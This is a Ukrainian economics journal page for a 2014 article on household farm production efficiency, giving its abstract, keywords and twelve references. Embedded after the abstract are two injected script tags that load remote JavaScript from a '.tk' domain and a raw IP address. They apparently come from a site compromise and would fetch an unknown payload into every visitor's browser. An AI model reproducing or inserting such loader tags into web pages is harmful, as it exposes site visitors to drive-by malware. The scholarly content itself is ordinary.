ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.435
Економіка агропромислового виробництва

Оцінка рівня економічної ефективності виробництва продукції в господарствах населення / Кальченко С. В. // Економіка АПК. - 2014. - № 8 - С. 31

Проаналізовано роль селянських домашніх господарств на сучасному етапі розвитку вітчизняного аграрного сектора. Охарактеризовано специфічні відмінності домашніх господарств у процесі здійснення виробничо-господарської діяльності, обґрунтовано необхідність оптимізації методики оцінки ефективності сільськогосподарського виробництва в селянських домогосподарствах. Проаналізовано результати сільськогосподарського виробництва в господарствах населення степової зони. Розглянуто вплив окремих факторів виробництва на рівень економічної ефективності сільського господарства в даному секторі аграрного підприємництва. Обґрунтовано диференційний підхід до оцінки ефективності сільськогосподарського виробництва в господарствах населення, а також необхідність трансформації наукових і методологічних підходів щодо розвитку дрібного аграрного підприємництва в сучасних умовах. Запропоновано шляхи розвитку аграрного виробництва в господарствах населення. Табл.: 3. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: господарства населення, сільськогосподарське виробництво, економічна ефективність, методичні підходи, аграрна сфера, аграрне підприємництво, оцінка ефективності виробництва

Список використаних джерел

 1. Макаренко Ю.П. Аграрні малі господарства: умови та шляхи розвитку / Ю.П. Макаренко. – Дніпропетровськ: Січ, 2012. – 680 с.
 2. Маркс К. Капитал. Т.1 / К. Маркс К., Ф. Энгельс. Соч. – М.: Госполитиздат, 1960. – 2-е изд. – Т.23. – 908 с.
 3. Месель-Веселяк В.Я. Розвиток сільського господарства (науково-методичне забезпечення) / В.Я. Месель-Веселяк // Економіка АПК. – 2011. – №7. – С.42-54.
 4. Саблук П.Т. Ціновий фактор у розвитку сільськогосподарського виробництва / П.Т. Саблук, В. Я. Месель-Веселяк // Економіка АПК. – 2011. – №9. – С.3-9.
 5. Чаянов А.В. Краткий курс кооперации / А.В. Чаянов/ – М.: Кооперативное товарищество, 1925. – 80 с.
 6. Чаянов А.В. Крестьянское хозяйство: Избранные труды / [редкол. сер.: Л. И. Абалкин (пред.) и др.]. – М. : Экономика, 1989. – 492 с. – (Экон.наследие).
 7. Яворська Т.І. Малий бізнес у сільському господарстві: теорія і практика: моногр. / Т.І. Яворська. – К. : ННЦ ІАЕ, 2012. – 386 с.
 8. Durrenberger, E. Paul (1980) Chayanov's Economic Analysis in Anthropology, Journal of Anthropological Research, Vol. 36, No. 2, Summer. – P. 133-148.
 9. Kujima, S. (1987). A.V. Chayanov's Conception of "Cooperative Collectivization". Japanese Slavic and East European Studies.
 10. Moseley, F. (1995) Marx's Economic Theory: True or False? Heterodox Economic Theories. True or False? http://www.mtholyoke.edu/~fmoseley/working%20papers/BLAUG.pdf.
 11. Shanin, T. (2009) ."Chayanov's treble death and tenuous resurrection: an essay about understanding, about roots of plausibility and about rural Russia" Journal of Peasant Studies, Vol. 36, no.1 – P. 83–101.
 12. Taussig, M. (1978) Peasant Economics and the Development of Capitalist Agriculture in the Cauca Valley, Colombia, Latin American Perspectives , Vol. 5, No. 3, Peasants, Capital Accumulation and Rural Underdevelopment, Summer. – P. 62-91.
Читати статтю: 14_08_31-37.pdf
Читати переклад статті: 1408kalchenko.pdf